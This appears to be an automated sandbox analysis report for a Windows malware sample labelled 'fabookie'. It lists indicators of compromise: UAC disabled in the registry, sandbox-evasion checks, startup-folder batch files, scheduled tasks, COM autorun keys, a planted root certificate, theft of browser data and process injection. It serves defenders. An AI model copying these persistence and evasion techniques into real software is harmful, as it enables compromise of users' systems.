fabookie | a227ed988685ef1ea5c99a26f1893a10e55097a88ae7035532d624f88bf1a49f

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	Install.exe

Drops startup file 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XUTUVWTivOiYzBBXX41BmgXG.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rnenCVo7tbfNJmB2YtEXDHmW.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5dxwvdrLOqUkuLqmPTyqhDTS.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ePQihrWxhLlkjQe104SHtIpf.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1z5SoSSGRV6tg0ranU9SKPpV.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fBAVTQXa3UCfv7vMGK9a77bI.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\i3zDv4k5ZnxxZaOQk93A5b8U.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GiSCpTslTg8YwUbyl8jrgpXE.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ctzgb0HLKy85yLAe2hO4dv7O.bat	jsc.exe

Executes dropped EXE 20 IoCs

pid	Process
3332	A4eWwZPDBoPplc9UFZADoEf0.exe
1520	beaEl9dZ428YIE6029Oh6QTl.exe
4932	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
1828	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
3728	yD9X3hAWS9ba2IwpGmmFzQSv.exe
860	schtasks.exe
4860	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
4888	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
1856	GQuJChOeLukAkRMNh8eCcIgT.exe
2160	BroomSetup.exe
3144	nsv6266.tmp
4356	dRDX5b2mCS4zyryljRWJpSDX.exe
4428	Install.exe
3648	Install.exe
4824	Assistant_106.0.4998.16_Setup.exe_sfx.exe
4024	assistant_installer.exe
1188	assistant_installer.exe
3128	OEjwHLp1P9vcmQziZ9gl6bgX.exe
2004	5ekdGv77gm4HHlUcItJrTddu.exe
5396	UYllEaK.exe

Loads dropped DLL 13 IoCs

pid	Process
4932	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
1828	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
860	schtasks.exe
4860	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
4888	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
1856	GQuJChOeLukAkRMNh8eCcIgT.exe
1856	GQuJChOeLukAkRMNh8eCcIgT.exe
4024	assistant_installer.exe
4024	assistant_installer.exe
1188	assistant_installer.exe
1188	assistant_installer.exe
2004	5ekdGv77gm4HHlUcItJrTddu.exe
2004	5ekdGv77gm4HHlUcItJrTddu.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Registers COM server for autorun 1 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FAE4421-D1C6-D6EE-5DDC-57FF9ABB31A2}\InProcServer32	5ekdGv77gm4HHlUcItJrTddu.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\CLSID\{1FAE4421-D1C6-D6EE-5DDC-57FF9ABB31A2}\InProcServer32	5ekdGv77gm4HHlUcItJrTddu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2EAE4421-D1C6-D6EE-5DDC-57FF9ABB31A2}\InProcServer32	5ekdGv77gm4HHlUcItJrTddu.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\CLSID\{2EAE4421-D1C6-D6EE-5DDC-57FF9ABB31A2}\InProcServer32	5ekdGv77gm4HHlUcItJrTddu.exe

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000023217-57.dat	upx
behavioral2/memory/4932-70-0x0000000000A20000-0x0000000000F08000-memory.dmp	upx
behavioral2/memory/1828-78-0x0000000000A20000-0x0000000000F08000-memory.dmp	upx
behavioral2/files/0x0006000000023217-87.dat	upx
behavioral2/files/0x0006000000023229-90.dat	upx
behavioral2/memory/860-98-0x0000000000CC0000-0x00000000011A8000-memory.dmp	upx
behavioral2/files/0x0006000000023217-77.dat	upx
behavioral2/files/0x0006000000023217-101.dat	upx
behavioral2/memory/860-100-0x0000000000CC0000-0x00000000011A8000-memory.dmp	upx
behavioral2/files/0x0006000000023217-63.dat	upx
behavioral2/memory/4860-109-0x0000000000A20000-0x0000000000F08000-memory.dmp	upx
behavioral2/files/0x0006000000023217-108.dat	upx
behavioral2/memory/4888-115-0x0000000000A20000-0x0000000000F08000-memory.dmp	upx
behavioral2/memory/4932-171-0x0000000000A20000-0x0000000000F08000-memory.dmp	upx
behavioral2/memory/1828-172-0x0000000000A20000-0x0000000000F08000-memory.dmp	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\D:	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
File opened (read-only)	\??\F:	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
File opened (read-only)	\??\D:	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
File opened (read-only)	\??\F:	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2432 set thread context of 220	2432	15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe	93

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ClocX\Presets\Bahnhofsuhr.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\Jaguar2Clock.bmp	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\Octopye2.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\romanblack\romanblackmin.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueBallRoman.ini	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\dsaqua.bmp	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\iToolsClock2.bmp	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Lang\Srpski.lng	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\Holzuhr.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\NewDefault.bmp	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Lang\Italiano.lng	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\BallClockAmber.bmp	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\BallClockAmber.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\MilkClock.bmp	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\Aqua.bmp	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\CloQ.ini	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\GuldKugler.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\UniversalAccess.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\romanold\romanoldhour.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\Blue_sphere.bmp	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\Original.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\hallow2.ini	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\mars.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\negro2.ini	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Lang\Arabic.lng	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Lang\Hungarian.lng	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Lang\Slovak.lng	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\Wall Clock medium.ini	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\earth.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\klokjemin.hpng	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\roman2\roman2hour.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\Wall Clock medium.bmp	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Sounds\trumpet.mp3	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Lang\Simple_Chinese.lng	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Lang\Slovenian.lng	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\MClkhrHand.hpng	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\White_Apple_Clock.bmp	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\White_Apple_Clock.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Lang\Nederlands.lng	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\AquaMade.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\Negro.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\romanold\romanoldmin.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\Windows Media Player\Icons\WordCount.dll	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Lang\Svenska.lng	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Lang\Suomi.lng	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\alarme.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\Comdex - Omega1.ini	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\earth2.ini	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\hallow2.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\greenmarble\marblemin.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\roman2\roman2minute.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Sounds\ring2.mp3	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\AJ-CityHall-500-minute.hpng	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlackBallRoman.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Lang\Turkce.lng	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlackClock.bmp	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\Kirchenuhr.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueBallRoman.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\BlueSphere.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\DSX4.BMP	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\DarkCrystalBall\minutehand-7.png	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\klokjehour.hpng	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Lang\Brazilian Portuguese.lng	5ekdGv77gm4HHlUcItJrTddu.exe
File created	C:\Program Files (x86)\ClocX\Presets\Casio.ini	5ekdGv77gm4HHlUcItJrTddu.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bVEVndcbdbMTLxjAoU.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 6 IoCs

installer

resource	yara_rule
behavioral2/files/0x000600000002328c-308.dat	nsis_installer_1
behavioral2/files/0x000600000002328c-308.dat	nsis_installer_2
behavioral2/files/0x000600000002328c-311.dat	nsis_installer_1
behavioral2/files/0x000600000002328c-311.dat	nsis_installer_2
behavioral2/files/0x000600000002328c-312.dat	nsis_installer_1
behavioral2/files/0x000600000002328c-312.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
3364	schtasks.exe
5600	schtasks.exe
2616	schtasks.exe
928	schtasks.exe
860	schtasks.exe
2720	schtasks.exe
5312	schtasks.exe
5380	schtasks.exe
5208	schtasks.exe
3396	schtasks.exe
1228	schtasks.exe
5632	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\CLSID	5ekdGv77gm4HHlUcItJrTddu.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\CLSID\{1FAE4421-D1C6-D6EE-5DDC-57FF9ABB31A2}	5ekdGv77gm4HHlUcItJrTddu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2EAE4421-D1C6-D6EE-5DDC-57FF9ABB31A2}\InProcServer32	5ekdGv77gm4HHlUcItJrTddu.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\CLSID\{2EAE4421-D1C6-D6EE-5DDC-57FF9ABB31A2}	5ekdGv77gm4HHlUcItJrTddu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FAE4421-D1C6-D6EE-5DDC-57FF9ABB31A2}\InProcServer32	5ekdGv77gm4HHlUcItJrTddu.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\CLSID\{1FAE4421-D1C6-D6EE-5DDC-57FF9ABB31A2}\InProcServer32	5ekdGv77gm4HHlUcItJrTddu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2EAE4421-D1C6-D6EE-5DDC-57FF9ABB31A2}	5ekdGv77gm4HHlUcItJrTddu.exe
Key created	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\CLSID\{2EAE4421-D1C6-D6EE-5DDC-57FF9ABB31A2}\InProcServer32	5ekdGv77gm4HHlUcItJrTddu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	5ekdGv77gm4HHlUcItJrTddu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1FAE4421-D1C6-D6EE-5DDC-57FF9ABB31A2}	5ekdGv77gm4HHlUcItJrTddu.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
2432	15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe
4860	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
4860	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
3704	powershell.EXE
3704	powershell.EXE
3704	powershell.EXE
2004	5ekdGv77gm4HHlUcItJrTddu.exe
2004	5ekdGv77gm4HHlUcItJrTddu.exe
2004	5ekdGv77gm4HHlUcItJrTddu.exe
2004	5ekdGv77gm4HHlUcItJrTddu.exe
2004	5ekdGv77gm4HHlUcItJrTddu.exe
2004	5ekdGv77gm4HHlUcItJrTddu.exe
2004	5ekdGv77gm4HHlUcItJrTddu.exe
2004	5ekdGv77gm4HHlUcItJrTddu.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2432	15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe
Token: SeDebugPrivilege	4860	BPdtJV4NFkQ45Ae1AkIs7lVJ.exe
Token: SeDebugPrivilege	220	jsc.exe
Token: SeDebugPrivilege	3704	powershell.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2160	BroomSetup.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2432 wrote to memory of 4860	2432	15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe	88
PID 2432 wrote to memory of 4860	2432	15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe	88
PID 2432 wrote to memory of 220	2432	15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe	93
PID 2432 wrote to memory of 220	2432	15845dec2c7e05004d52ed8c1541d3b364fe6155f9263f7599b4e684fab2c3a5.exe	93
